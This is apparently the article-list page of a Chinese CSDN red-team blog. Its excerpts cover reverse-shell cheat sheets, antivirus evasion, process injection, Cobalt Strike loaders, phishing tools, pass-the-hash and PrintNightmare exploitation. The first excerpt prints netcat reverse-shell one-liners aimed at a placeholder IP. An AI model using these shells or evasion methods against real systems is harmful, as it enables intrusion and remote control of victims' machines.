自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(21)
  • 收藏
  • 关注

原创 红队笔记专属-shell备忘录

前言:​ 建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会!最全。反向shell-备忘录:​ 通常在获得远程代码执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互,从实战的意义来讲,反弹shell是非常有必要的,以下将从不同的工具出发,nclisten:nc -nlvp PORTconnect:nc -e /bin/sh IP PORTornc -c sh I

2022-04-02 15:20:56 4265

原创 免杀基础之一文学废PE文件格式

前言PE文件的全称是Portable Executable ,意为可移植的可执行文件,常见的有EXE,DLL,SYS,COM,OCX,PE文件是微软Windows操作系统上的程序文件。简单来理解,就是一种数据结构。我们知道知道CPU只认识二进制数,所以可执行文件保存在磁盘中都是以二进制数保存的,不过为了查看,所以市面上的编辑器都是用16进制显示的,比如下面这样,使用010Editer打开一个PE文件:PE文件结构如下:有的数据结构是用来执行的代码,有的数据结构是用来保存数据。基础知识基地址

2022-03-31 13:41:07 4651

原创 红队搬运工-github项目-第一期

1.Mip22github链接:https://github.com/makdosx/mip22介绍:高级网络钓鱼工具,适用于 Linux 和 Android,只需安装并选择手动或自动攻击,就可以选择要使用的网络钓鱼方法类型开发语言:Shell推荐理由:自动攻击方法易于使用,并预装了超过 60 种克隆电子服务,即社交媒体网络、电子邮件提供商和云提供商,也可以使用手动方法并通过 Web 浏览器自己克隆自己的服务,并且它还可以访问隧道设置以及电子邮件服务2.Legiongithub链接:https:

2022-03-24 16:25:04 1730

原创 红队免杀培训-手把手教使用系统调用(上)

1.前言:为了应对,AV/EDR对一些常规windows的api的监控,使用的github项目为Syswhispers,其实CS官方有个付费工具包叫 CobaltStrike Artifact,可以定制化生成有效负载,当然其中也包括了使用系统调用,替换掉beacon里面的api函数,当然付费真的用不起,对于穷人来说,只能靠手动冲!2.实现:在此之前,我们得想一想我们该替换什么api,我们需要用到什么api,看以下加载器的示例:#include <iostream>#include &l

2022-03-18 14:36:07 556

原创 红队搬运工-github有趣的免杀项目分享

前言:​ github一直是it行业最大的同性交流网站,上面的开源好项目非常之多,不少的渗透好工具都出自github上面的大佬,尤其是免杀的loader,github一直是好免杀的藏宝阁,拿来就能用,拿来就能免,除非被杀软标记很多的项目,大部分免杀效果都很好的。分享:1.DPlantgithub链接:https://github.com/trickster0/UDPlant介绍:UDP版本的反向shell工具,在 windows 和 linux 中都能完美运行开发语言:rust推荐理由:rus

2022-03-17 11:38:20 1779

原创 红队免杀必会-进程注入--注册表-全局钩

前言​ 进程注入 ,简而言之就是将代码注入到另一个进程中,跨进程内存注入,即攻击者将其代码隐藏在合法进程中,长期以来一直被用作逃避检测的手段.​ 进程的注入方式可以分为DLL注入和shellcode注入,这两种方式本质上没有区别,在操作系统层面上,dll也就是shellcode的汇编代码。代码框架​ 想法是尽量用一个通用的注入框架,有异常接收,令牌权限开启,获取进程PID的功能,只需要在main函数中调用不同的注入方式:#include "public.h"int main() { DWORD

2022-03-12 21:39:50 4376

原创 CS反制-CS服务器新特征

CobaltStrike是一款基于Java编写的全平台多方协同后渗透攻击框架,几乎覆盖了APT攻击链中所需要用到的各个技术环节。基本描述CobaltStrike的HTTP(S)监听器对请求URL未进行"/"开头验证,攻击者可通过指定URL获取相关信息。有效载荷GET stager HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0测试过程影响范围CobaltStrike <= 4.5该特征已申请了CVE!最后HW临近,公众

2022-03-12 21:38:54 4474

原创 红队免杀培训第二章-使用系统调用http 协议下载恶意载荷

​ 这是红队免杀培训的第二章,后续会继续推出红队免杀培训的一些小tips,等后面把这系列更完了,大家把所有的技术点窜起来一起用,那就是乱杀,上一章说了如何避免申请可执行内存块,执行shellcode,这一章将讲如何使用系统调用下载恶意载荷。前言:​ 从杀软的行为分析来看,就拿cs的通信协议来讲,stage 的载荷在行为上是明显比stageless载荷多很多的,其中不免一些通信协议的特征,分析过的都知道,stage只是个前置载荷,后续会下更大的功能更全的载荷,因为之前做免杀卡巴的时候就注意到

2022-03-12 21:35:00 3040

原创 红队免杀培训第一章-不可执行的shellcode

临近全国hw,后面会陆续推出红队免杀培训文章,希望能到诸君能在赛场上乱免,不会把现成的加载器放出来,但是例子改一下就是一个好的加载器,强调一遍,免杀并不是一种技术的一支独秀,而是百花齐放!前言:​ 这里照常去做CS的免杀加载器的实现,因为用先有的c2框架是非常方便顺手,当然你自己开发的c2框架也行,肯定也有生成shellcode这个功能,也需要进行内存执行的需求。​ 今天要讲的这种原理是根据ntdll.dll先有的指令来执行我们的代码,恶意代码保存在于数据部分中,这种的好处是我们绕过了不可执行的内

2022-03-05 14:22:31 580

原创 红队漏洞研究-fastjsonBasicDataSource链分析

前言BCELBCEL的全名是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,CC链也就是从Apache Commons产生的。BCEL库提供了一系列用于分析、创建、修改Java Class文件的API。主要用来将xml文档转为class文件。编译后的class被称为translet,可以在后续用于对XML文件的转换。该库已经内置在了JDK中。关于BCEL具体详情可参考https://www.leavesongs.com/PENETRATION/where-i

2022-03-05 14:21:25 1063

原创 抓住黑客-爆破frp

起因以前一直以为只有我一个人用frp来做内网的socks5代理,后来不知道为啥越来越多的人也用frp来做内网socks5了。在上次的攻防演练中发现了其他攻击队上传的一个frpc.ini打开发现里面frpc和frps没有做验证。所以在想能不能写一个工具去批量验证frps有没有密码,以及爆破frps的token。frpc请求分析环境:frpc:192.168.153.154frps:192.168.153.135在不使用token的情况下。直接用wireshark抓取frpc和frps的连接数据包,

2022-02-13 17:02:53 4417

原创 RunAsPPL的对抗

启用LSA进程的保护LSA 保护又名 RunAsPPL这里直接引用官网的官方文档:https://docs.microsoft.com/en-us/windowsserver/security/credentials-protection-and-management/configuringadditional-lsa-protection#to-disable-lsa-protection开启RunAsPPL 一般有两种方法1.在单台计算机上启用 LSA 保护打开注册表编辑器 (RegEdi

2022-01-15 14:18:35 1067

原创 微软通杀漏洞-CVE-2021-1675复现

环境受害机:window2019(192.168.153.133)攻击机:kali(192.168.153.134)利用前提或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限一定需要:一个普通的域用户一定需要:开启Spooler服务环境搭建安装impacketgit clone https://github.com/cube0x0/impacketcd impacketpython3 ./setup.py insta

2021-08-06 12:56:18 356

原创 域渗透技巧

内网域信息收集SPN的发现前言:由于每台服务器都需要注册用于Kerberos身份验证服务的SPN,因此这为在不进行大规模端口扫描的情况下收集有关内网域环境的信息提供了一个更加隐蔽的方法。工具:SetSPN查询:windows系统自带的setspn可以查询域内的SPN#查看当前域内所有的SPN:setspn -Q */*#查看指定域xie.com注册的SPN:setspn -T xie.com -Q */*setspn -X删除指定SPN查找指定用户/主机名注册的SPN:setspn

2021-08-06 12:44:20 642

原创 未开启3389实现远程桌面

适用前提目标服务器出网,且存在session(用户没有logoff)。适用场景目标靶机无法通过3389登录用户桌面。使用工具anydesk如何使用先下载AnyDeskhttps://download.anydesk.com/AnyDesk.exe打开AnyDesk设置好密码,以及记住你的连接地址(下图打码部分)。退出本地的AnyDesk,然后到c:\Users{USER}\AppData\Roaming\AnyDesk目录下将ad.trace、service.conf、syste

2021-08-06 12:25:23 280

原创 DLL劫持原理学习

0x01 什么是DLL?百度百科:DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。一个应用程序可使用多个DLL文件,一个DLL文件也可能被不同的应用程序使用,这样的DLL文件被称为共享DLL文件。简而言之:DLL 是一个包含可由多个程序同时使用的代码和数据的库。例

2021-08-06 12:22:30 1007

原创 CS免杀之信手拈来

前言最近搞了一个cs免杀的东西出来,主流的杀毒软件,某绒,某0,windows defender都轻松过掉,但是把在测试卡巴全方位版时,成功上线之后就死掉了,我怀疑不是内存查杀,如果是内存查杀,我把shellcode写进去内存的时候,就应该爆肚了,我觉得还是cs上线之后的行为触发卡巴的杀毒机制,就哦豁了。然后我就在github上面找点项目来参考一下,果然找到一个很不错的项目,这里分享给大家。免杀实践项目地址:https://github.com/ORCA666/EVA2根据作者描述,这个项目

2021-08-06 11:40:19 1556 1

原创 一款轻松免杀主流杀软的c2框架

前言恕我直言,cs 无论是马或者源文件都被分析烂了,且 cs 的行为太明显了,必 须要大改特改才能满足现在的红蓝对抗,但是想大改谈何容易,所以最快的方 法是寻找一款新的 c2 框架,说白了,远控自己都能写一个出来,执行一些简单 操作还是可以的。故事从现在开始最佳有一款老外开发的猎鹰 c2 框架说是要在下周发布,看着很吊的样子,我们 拭目以待,今天要介绍的一款好玩的用 rust 语言开发的 c2 框架,是我无意间 逛 github 上面看到的,这里我记录一下此框架的使用:为啥我会选择这个框 架,因为它是

2021-06-30 16:22:07 2415 3

原创 红队技巧-常规横向手法

前言域内横向移动技术是红队作战在域内最基本技术之一,红队人员会利用该技术,以被攻陷的系统为跳板,通过已经收集的凭据和密码,来访问域内其他主机,扩大战果,最终目的是获取到dc的访问控制权限。实操1.ICPIpc(共享命名管道),其作用是为了实现进程间通信而开放的命名管道。ipc可以通过用户名和密码建立ipc链接,获取相应的用户权限。目标机应开放139和445端口,以支持实现远程登陆和默认共享资源的访问首先需要在跳板机和目标机建立ipc连接#建立ipc连接net use \\192.168.75

2021-06-29 16:16:40 792

原创 红队技巧-在端口限制下的砥砺前行

前言就在昨天一个大佬被提及面试腾讯的经历,嗯?也就那样吧,很基础。。。。。。。这就是大佬吧,膜拜大佬!然后我好奇的看了一下面试的一些问题,然后其中一个实战问题让我来了兴趣,问如果整站被web.config做了出站限制,在不更改web.config的情况下如何转发?唉,我知道,但是我就不说,我就是玩儿!这让我想到面试zteam的时候,大佬问我,如果做了端口限制,只开80,不出网,如何实现内网穿透,一层还好,就直接上http代理就行,多层内网就不行,这时候就需要用到端口复用。资料参考端口复用,顾名思义,

2021-06-29 15:50:53 307

原创 红队技巧-域渗透的协议利用

1.pth(hash传递)1.1 PTH简介哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统,攻击者无须通过解密hash值来获取明文密码,因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击,攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。1.2 PTH限制在03之后有了uac,所以本地只有sid 为500和admi

2021-06-29 15:29:09 2356

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除